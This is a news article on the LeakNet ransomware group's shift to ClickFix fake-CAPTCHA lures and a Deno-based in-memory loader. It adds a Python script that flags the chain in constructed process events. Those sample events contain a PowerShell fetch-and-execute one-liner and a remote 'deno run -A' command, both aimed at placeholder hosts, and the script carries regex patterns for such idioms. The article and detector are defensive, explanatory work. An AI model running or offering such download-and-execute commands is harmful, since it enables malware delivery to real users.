CYBER

LeakNet Ransomware Employs ClickFix Social Engineering and Deno In-Memory Loader in Evolving Attack Chain

🕓 1 min read

The LeakNet ransomware operation has changed its initial access strategy: instead of buying stolen credentials from initial access brokers (IABs), it now seeds the "ClickFix" social engineering lure on compromised legitimate websites, according to a new technical report from cybersecurity firm ReliaQuest. A ClickFix lure presents a fabricated error, typically a fake CAPTCHA verification failure, and walks the visitor through "fixing" it by copying a command and running it themselves. Because the victim executes the command, no exploit is needed, and controls that look for exploitation or a malicious download get little to trigger on; the attack instead abuses trust in a familiar verification workflow. Compromised sites serve whoever visits them, so the campaign casts a wide net across industries rather than targeting a specific vertical.

The second notable change in LeakNet's attack chain is a staged command-and-control (C2) loader built on the Deno JavaScript runtime. Deno is a single-binary runtime for JavaScript and TypeScript that can fetch and run modules directly from a URL, and the loader uses it to execute subsequent stages in memory rather than dropping them as files ("fileless" execution). That hinders antivirus products that rely on scanning files written to disk, and because the Deno binary itself is a legitimate developer tool, its mere presence is not a reliable indicator. The result is a flexible platform for orchestrating post-exploitation activity that blends in with ordinary tooling.

Together, the two tactics, social engineering for access and in-memory execution for deployment, form a potent and repeatable attack sequence. The key defensive point from ReliaQuest's analysis is that regardless of how entry is obtained (a ClickFix lure or purchased access), the post-exploitation behaviour is consistent, which gives defenders concrete detection opportunities at several stages well before the ransomware payload is deployed. Understanding the sequence, from the fake CAPTCHA lure to the Deno-based memory loader, is what lets teams build behavioural detections (on process lineage and command lines rather than file hashes) that disrupt the chain early.
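As an added illustration of the behavioural detection idea above (example code written for this page, not ReliaQuest's or LeakNet's own tooling), the following Python script runs two rules and one correlation over constructed Sysmon-style process-creation events. It assumes the common ClickFix variant in which the lure tells the victim to paste into the Windows Run dialog, so the interpreter's parent is explorer.exe, and it assumes the loader is invoked through the Deno CLI (`deno run`/`deno eval`) with a remote module; the article does not confirm either detail. Hostnames, paths, URLs and rule names are all made up.

```python
"""Toy behavioural detector for a ClickFix -> Deno in-memory loader sequence.

Added example for this article. All events below are constructed; the parent
process, CLI shape and URLs are assumptions, not details from the report.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal Sysmon Event ID 1 shape: who spawned what, with what command line."""
    host: str
    parent_image: str
    image: str
    command_line: str


# Constructed sample telemetry (not real data). ws01 shows the full chain,
# ws02 is benign Office use, dev01 is a developer running a local Deno module.
SAMPLE_EVENTS = [
    ProcEvent("ws01", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iex (irm https://captcha-check.example/verify)"'),
    ProcEvent("ws01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Users\alice\.deno\bin\deno.exe",
              "deno run -A https://cdn.example/stage2.ts"),
    ProcEvent("ws02", r"C:\Windows\explorer.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              '"WINWORD.EXE" /n report.docx'),
    ProcEvent("dev01", r"C:\Windows\System32\cmd.exe",
              r"C:\Users\bob\.deno\bin\deno.exe",
              "deno run --allow-net main.ts"),
]

# Interpreters a ClickFix lure typically asks the user to paste into.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}

# "Download something and execute it" idioms seen in pasted one-liners.
REMOTE_FETCH_EXEC = re.compile(
    r"(iex|invoke-expression)\b.*\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b"
    r"|mshta\s+https?://",
    re.I,
)
# Deno pulling a module straight from a URL, or evaluating inline code.
DENO_REMOTE = re.compile(r"\bdeno(\.exe)?\b.*\b(run|eval)\b.*https?://\S+", re.I)
DENO_EVAL = re.compile(r"\bdeno(\.exe)?\b.*\beval\b", re.I)


def basename(path: str) -> str:
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_clickfix_paste(ev: ProcEvent) -> bool:
    """Rule 1: interpreter launched from explorer.exe (Run dialog) with a fetch-and-execute command line."""
    return (basename(ev.parent_image) == "explorer.exe"
            and basename(ev.image) in INTERPRETERS
            and REMOTE_FETCH_EXEC.search(ev.command_line) is not None)


def is_deno_remote_load(ev: ProcEvent) -> bool:
    """Rule 2: deno.exe running a remote module or inline eval. A local module (dev01) is not flagged."""
    return basename(ev.image) == "deno.exe" and bool(
        DENO_REMOTE.search(ev.command_line) or DENO_EVAL.search(ev.command_line))


def detect(events):
    """Apply both rules and escalate when a remote Deno load is a child of a pasted interpreter.

    Correlation here is by host and parent image name, and assumes the paste event
    is seen first; a real pipeline would join on ParentProcessGuid instead.
    """
    findings = []
    pasted_by_host: dict[str, set[str]] = {}
    for ev in events:
        if is_clickfix_paste(ev):
            findings.append((ev.host, "clickfix_paste", "medium"))
            pasted_by_host.setdefault(ev.host, set()).add(basename(ev.image))
        if is_deno_remote_load(ev):
            if basename(ev.parent_image) in pasted_by_host.get(ev.host, set()):
                findings.append((ev.host, "clickfix_to_deno_loader", "high"))
            else:
                findings.append((ev.host, "deno_remote_load", "medium"))
    return findings


if __name__ == "__main__":
    for host, rule, severity in detect(SAMPLE_EVENTS):
        print(f"{host}\t{severity}\t{rule}")
```

Only ws01 produces alerts: the pasted PowerShell one-liner fires the medium-severity paste rule, and the Deno child that fetches `stage2.ts` over HTTPS is escalated to high because its parent is the same interpreter. The developer on dev01 running a local module with `--allow-net` stays quiet, which is the point of keying on the remote-module pattern rather than on deno.exe itself.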

The operational benefits for LeakNet are substantial. The ClickFix method reduces dependence on volatile third-party access brokers, lowers the per-victim acquisition cost, and eliminates the bottleneck of waiting for valuable corporate credentials to appear on underground markets. First appearing in November 2024 and styling itself as a "digital watchdog" for "internet freedom," LeakNet has targeted industrial entities, according to data from industrial cybersecurity firm Dragos. Its adoption of these advanced techniques signals a broader trend where ransomware groups are increasingly weaponizing trusted user interactions and leveraging modern development platforms like Deno to enhance stealth and efficacy.
